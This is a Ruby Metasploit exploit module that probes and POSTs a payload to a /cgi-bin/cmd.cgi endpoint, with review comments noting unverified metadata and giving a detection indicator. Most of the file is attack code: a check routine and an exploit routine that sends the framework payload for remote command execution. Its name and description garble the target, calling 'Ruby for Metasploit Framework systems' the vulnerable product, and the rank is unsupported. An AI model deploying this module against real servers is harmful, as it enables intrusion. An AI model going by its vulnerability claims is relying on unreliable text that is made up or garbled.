cgi_cmd_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
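# Metasploit remote exploit module that talks to a /cgi-bin/cmd.cgi endpoint over HTTP.
#
# NOTE(review): the metadata names no vendor, product or version and carries no
# References or DisclosureDate, so nothing on this page ties the module to a
# published advisory. Treat its claims, including the rank below, as unverified.
#
# Detection note: the only traffic this module generates is a GET to
# /cgi-bin/cmd.cgi (check) and a POST to the same path (exploit), so requests
# to that path in web server or proxy logs are the observable indicator.
class MetasploitModule < Msf::Exploit::Remote
  # NOTE(review): ExcellentRanking is asserted without supporting evidence on this page.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata with the framework.
  #
  # The metadata hash is passed to the parent constructor exactly once; the
  # page showed a second, empty `super(update_info(info, ))` call and several
  # hash keys swallowed by trailing comments, which left the file unparsable.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ruby for Metasploit Framework Remote Code Execution Vulnerability in /cgi-bin/cmd.cgi',
        'Description' => %q{ This module exploits a remote code execution vulnerability in the /cgi-bin/cmd.cgi script on Ruby for Metasploit Framework systems
        },
        'Author' => ['TcherBer'], # an author or list of authors
        'Payload' => {}, # payload info
        'Platform' => ['unix', 'linux'], # platform info (Unix, Linux, etc.)
        'Targets' => [
          ["Automatic", {}]
        ] # targets info (OS version, etc.)
      )
    )
  end

  # Fingerprints the target by requesting /cgi-bin/cmd.cgi and looking for the
  # "Command Executor" marker in the response body. No command is run, so the
  # strongest result this evidence can justify is Appears, not Vulnerable.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when there is no HTTP response,
  #   Appears when a 200 response contains the marker, Safe otherwise
  def check
    vprint_status("Checking target")
    res = send_request_cgi({ "uri" => "/cgi-bin/cmd.cgi" })

    # A missing response (timeout, refused connection) says nothing about the
    # target; reporting Safe here would give false assurance to an assessor.
    return Exploit::CheckCode::Unknown unless res

    # The page had `res.body = ~/Command Executor/`, which assigns to the body
    # instead of matching it; a plain substring test is what was intended.
    if res.code == 200 && res.body.to_s.include?('Command Executor')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Issues one POST to /cgi-bin/cmd.cgi, passing `payload` as the request data.
  # The response is neither read nor checked.
  def exploit
    print_status("Sending payload...")
    send_request_raw({
      "method" => "POST",
      "uri" => "/cgi-bin/cmd.cgi",
      "data" => payload
    })
  end
end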